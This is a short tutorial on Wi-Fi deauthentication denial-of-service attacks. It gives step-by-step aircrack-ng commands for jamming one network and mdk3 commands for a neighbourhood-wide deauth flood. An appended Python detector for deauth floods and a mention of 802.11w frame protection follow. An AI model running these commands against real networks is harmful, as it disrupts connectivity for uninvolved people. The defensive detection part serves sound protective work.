DEAUTH ATTACK

It is a denial-of-service (DoS) attack targeting the link between a router and its connected clients. A crafted deauth packet is sent to the router, which results in termination of the connection between the router and a client.

The diagram below depicts the theory.

STEPS

Initiating a deauth consists of the following steps:

  1. Initiate promiscuous mode AKA monitor mode
  2. Scan for networks
  3. Select target network
  4. Launch the attack

 

1. INITIATE PROMISCUOUS MODE

airmon-ng start <WIRELESS INTERFACE>

airmon-ng start wlp3s0

Make sure to check our previous tutorial on "Attacking WPS" if you are stuck at this step.

 

2. SCAN FOR NETWORKS

airodump-ng <WIRELESS INTERFACE>

airodump-ng wlp3s0mon

 

3. SELECT TARGET NETWORK

From the airodump window, select the target network and copy its BSSID (first column).

 

4. LAUNCH THE ATTACK

aireplay-ng -0 0 -a <BSSID> <MONITOR INTERFACE>

aireplay-ng -0 0 -a 30:b5:c2:dd:ee:ff wlp3s0mon

 

 

 

This tactic targets a single Wi-Fi network. To perform a mass deauth attack across a neighbourhood, attackers use a more sophisticated tool called mdk3, which is built into Kali and other pentesting distros. Beware: this will cause total havoc in your neighbourhood because Wi-Fi becomes unavailable.

SYNTAX

# mdk3 <INTERFACE> d

mdk3 wlp3s0mon d

To fix it to a particular channel:

# mdk3 <INTERFACE> d -c <CHANNEL NUMBER>

mdk3 wlp3s0mon d -c 2
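
Added example (not part of the original tutorial): a defender-side detector for the traffic that both the aireplay-ng step and the mdk3 variant put on the air, namely a burst of deauthentication or disassociation frames for one BSSID. The frame bytes, MAC addresses, one-second window and 10-frame threshold are constructed assumptions; a real sensor would feed in frames from its own monitor-mode capture with the radiotap header stripped.

```python
import struct
from collections import defaultdict, deque

TEARDOWN = {10: "disassoc", 12: "deauth"}  # 802.11 management frame subtypes

def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_teardown(frame):
    """Parse a raw 802.11 frame (radiotap header already stripped).
    Returns (kind, dest, bssid, reason) for deauth/disassoc, else None."""
    if len(frame) < 26:
        return None  # 24-byte management header + 2-byte reason code
    version, ftype, subtype = frame[0] & 0x03, (frame[0] >> 2) & 0x03, frame[0] >> 4
    if version != 0 or ftype != 0 or subtype not in TEARDOWN:
        return None  # not a management-type teardown frame
    (reason,) = struct.unpack_from("<H", frame, 24)
    return TEARDOWN[subtype], mac(frame[4:10]), mac(frame[16:22]), reason

def detect_floods(records, window=1.0, threshold=10):
    """records: time-ordered (timestamp_s, raw_frame) pairs. Returns one alert per
    BSSID that reaches `threshold` teardown frames within `window` seconds."""
    recent = defaultdict(deque)  # bssid -> timestamps still inside the window
    alerts = {}
    for ts, frame in records:
        parsed = parse_teardown(frame)
        if parsed is None:
            continue
        _kind, dest, bssid, _reason = parsed
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps older than the window
            q.popleft()
        if len(q) >= threshold and bssid not in alerts:
            alerts[bssid] = {"bssid": bssid, "first_seen": q[0], "count": len(q),
                             "broadcast": dest == "ff:ff:ff:ff:ff:ff"}  # tripping frame's dest
    return list(alerts.values())

def sample_capture():
    """Constructed frames: a beacon, one ordinary deauth, and a 20-frame burst."""
    def frame(fc0, dest, bssid, reason=7):
        return (bytes([fc0, 0]) + b"\x00\x00" + dest + bssid + bssid
                + b"\x00\x00" + struct.pack("<H", reason))
    a, b = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
    sta, bcast = bytes.fromhex("0200000000aa"), b"\xff" * 6
    burst = [(10.0 + i * 0.02, frame(0xC0, bcast, a)) for i in range(20)]
    return [(1.0, frame(0x80, bcast, a)), (5.0, frame(0xC0, sta, b, 3))] + burst

if __name__ == "__main__":
    print(detect_floods(sample_capture()))
```

Detection pairs with prevention: networks that enable 802.11w Protected Management Frames let clients reject spoofed deauthentication frames.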